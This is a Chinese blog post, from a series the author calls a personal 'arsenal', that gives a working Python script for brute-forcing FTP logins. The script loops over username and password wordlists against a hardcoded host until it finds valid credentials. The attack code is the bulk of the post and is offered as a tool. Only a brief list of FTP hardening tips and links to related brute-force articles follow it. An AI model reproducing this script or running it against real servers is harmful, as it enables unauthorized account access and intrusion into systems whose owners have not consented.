#我的武器库系列#之Ftp爆破核心实现

最新推荐文章于 2024-05-18 00:37:32 发布
最新推荐文章于 2024-05-18 00:37:32 发布
阅读量420 收藏 1
点赞数
分类专栏: python 渗透攻击 文章标签: python ftp爆破 ftp爆破
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a59a59/article/details/94621448
版权

        本篇是关于ftp的爆破实现。ftp爆破实现原理非常简单,利用ftplib组件,通过读取字典表username及password逐一尝试登录。

一、源代码

#-*- coding:utf8 -*-
import ftplib

def crackhandle(host,username,password):
    try:
        ftp = ftplib.FTP(host);
        ftp.login(username,password);
        ftp.quit();
        return True;
    except Exception as e:
        print("login fail! username is %s password is %s" % (username,password));
        pass;

def crack():
    host ="192.168.1.108";
    passwordsList = open("/root/Desktop/pythonTest/password.txt");
    usernamesList = open("/root/Desktop/pythonTest/username.txt");
    passwords = passwordsList.readlines();
    usernames = usernamesList.readlines();
    switch = False;
    for usuername in usernames:
        username = usuername.strip();
        for password in passwords:
            password = password.strip();
            recv = crackhandle(host,str(username),str(password));
            if recv:
                print("success userName is %s password is %s" % (username,password));
                switch = True;
                break;
        if switch:
            break;
crack();

运行指令:python ftpcrack.py

效果图如下,可见通过爆破成功。

二、关于ftp的安全提升

    1.从本地安全策略进行登录错误设置;

    2.使用SSL加密;

    3.用户权限设置合理化;

    4.用户名及密码避免简单化;

    5.匿名访问按需开启;

登峰造Geek
关注
专栏目录
[网络安全自学篇] 十四.Python攻防之基础常识、正则表达式、Web编程和套接字通信(一)
杨秀璋的专栏
09-29 2万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了Wireshark抓包原理知识,并结合NetworkMiner工具抓取了图像资源和用户名密码,本文将讲解Python网络攻防相关基础知识,包括正则表达式、Web编程和套接字通信。本文参考了爱春秋ADO老师的课程内容,这里也推荐大家观看他Bilibili和ichunqiu的课程,同时也结合了作者之前的经验进行讲解。
[网络安全自学篇] 八十四.《Windows黑客编程技术详解》之VS环境配置、基础知识及DLL延迟加载详解(1)
杨秀璋的专栏
06-19 1万+
从这篇文章开始,作者将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点。第一篇文章主要包括两部分内容,开发环境(VS、编译设置)、基础技术、运行单一实例(互斥对象示例)、DLL延迟加载(skin++换皮肤示例)、资源释放(MFC示例)。希望对您有所帮助~
ftp爆破FunboxLunchbreaker
tpaer的博客
10-07 784
一次简单的爆破通关。
ftplib爆破FTP口令
weixin_34392843的博客
06-11 112
#coding:utf-8 #author:jwong import ftplib def bruteLogin(hostname,passwordFile): with open(passwordFile,'r') as f: for line in f.readlines(): username = line.split(':')[0] passwo...
ftp爆破工具
07-25
支持多线程, 自定义字典, 下载时建议关掉查杀工具 Usage: ftpscan [Thread] Example: ftpscan 10.0.0.1-10.0.0.254 200
Python 渗透测试:FTP 文件传输 爆破.(21端口)
网络安全领域___专研者.
05-18 720
文件传输是指在计算机网络中将数据从一个位置传输到另一个位置的过程。文件传输爆破是一种黑客攻击手段,主要针对文件传输系统的漏洞进行暴力破解.
ftp爆破分析
gso918的专栏
03-22 1209
1.ftp爆破 C:\Windows\system32>nmap --script ftp-brute -p 21 192.168.172.141 Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-21 11:28 ?D1ú±ê×?ê±?? Nmap scan report for 192.168.172.141 Host is up (...
[网络安全自学篇] 七十一.深信服分享之外部威胁防护和勒索病毒对抗
热门推荐
杨秀璋的专栏
04-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前面三篇文章详细分享了WannaCry勒索病毒,包括病毒复现、IDA和OD逆向分析蠕虫传播、防护措施等,那么如何防护呢?所以,接下来这篇文章作者将分享来自深信服老师的《外部威胁防护和勒索病毒对抗》,带领大家看看知名安全厂商的威胁防护措施,包括网络安全面临的挑战、如何有效的应对挑战、深信服安全建设之道等。基础性文章,希望对您有所帮助,如果存在错误或不足之处,还望告知,加油!
[渗透工具] - IP资产POC扫描、指纹扫描、端口爆破扫描系统
渗透测试教程
02-21 3281
地址 : https://github.com/awake1t/linglong linglong 一款资产巡航扫描系统。系统定位是通过masscan+nmap无限循环去发现新增资产,自动进行端口弱口令爆破/、指纹识别、XrayPoc扫描。主要功能包括: 资产探测、端口爆破、Poc扫描、指纹识别、定时任务、管理后台识别、报表展示。 使用场景是Docker搭建好之后,设置好你要扫描的网段跟爆破任务。就不要管他了,没事过来收漏洞就行了 功能清单 masscan+namp巡航扫描资产 创建定时爆破任务(FT
渗透测试 ( 5 ) --- 扫描之王 nmap、渗透测试工具实战技巧合集
墨鱼菜鸡
07-11 5730
Nmap 官方文档 ( 中文文档是 Nmap 版本4.50,英文文档是最新的): 英文文档:https://nmap.org/book/man.html中文文档:https://nmap.org/man/zh/index.html#man-description官方 Nmap 项目指南:https://nmap.org/book/toc.html ...
批量爆破FTP空间密码
02-19
批量爆破FTP空间密码 批量爆破FTP空间密码
ftp暴力破解源码(java双击运行)
05-07
ftp暴力破解,可以在window系统双击执行,导出jar后方可执行,穷举代码暴力破解ftp
Python批量爆破ftp账号密码
12-04
Python,批量,爆破,ftp密码
ftp密码加强爆破工具
04-06
ftp密码加强爆破工具
FTP弱口令爆破工具
01-11
FTP弱口令爆破工具
2021-10-15 ftp爆破
夕阳的街道的博客
10-15 3836
一、实验题目: ftp爆破 二、实验内容: 使用Hydra工具和口令字典进行ftp爆破 三、环境准备: (1)kali虚拟机 (2)Metasploitable靶机 四、实验步骤: (1)在kali中创建账号字典和密码字典(存放位置可自定义): 命令: touch /home/kali/Desktop/user.txt(账号字典) touch /home/kali/De...
ftp密码爆破
weixin_45734980的博客
06-14 3057
写在前面:请勿用于不法用途。本次测试经过授权。 前情描述 学生时代计算机课上交作业老师最喜欢使用FTP了。如下图所示。 甚至连ip永远都是192.158.50.2。 爆破思路 发包,根据反馈判断 使用nmap扫描 其实我感觉前期的扫描好像没什么意义,目前没看出来用处 获取ftp服务是开启的(这不废话么),以及主机使用Windows server 构造数据包 一开始我试图使用burpsuite,跟网页一样去进行字典爆破。无奈proxy里面对这个登录包intercept不到。 后来我试着用wireshark
FTP爆破攻击:使用Python脚本快速测试FTP服务器的安全性
weixin_43263566的博客
05-30 1852
使用Python脚本进行FTP暴力破解
ftp服务暴力破解
m0_71366428的博客
12-14 942
暴力破解漏洞的产生是由于服务器端没有做限制,导致攻击者可以通过暴力的手段破解所需信息,如用户名、密码、短信验证码等。暴力破解的关键在于字典的大小及字典是否具有针对性,如登录时,需要输入4位数字的短信验证码,那么暴力破解的范围就是0000~9999。
Linux 具备武器库 镜像下载
最新发布
07-03
Linux 操作系统因其开源和灵活性而被广泛采用,确实拥有丰富的软件武器库,这些软件通常被称为软件包或镜像。Linux 官方的主要发行版如Ubuntu、Debian、CentOS等都有自己的软件仓库,用户可以通过这些仓库下载预配置...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

登峰造Geek

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值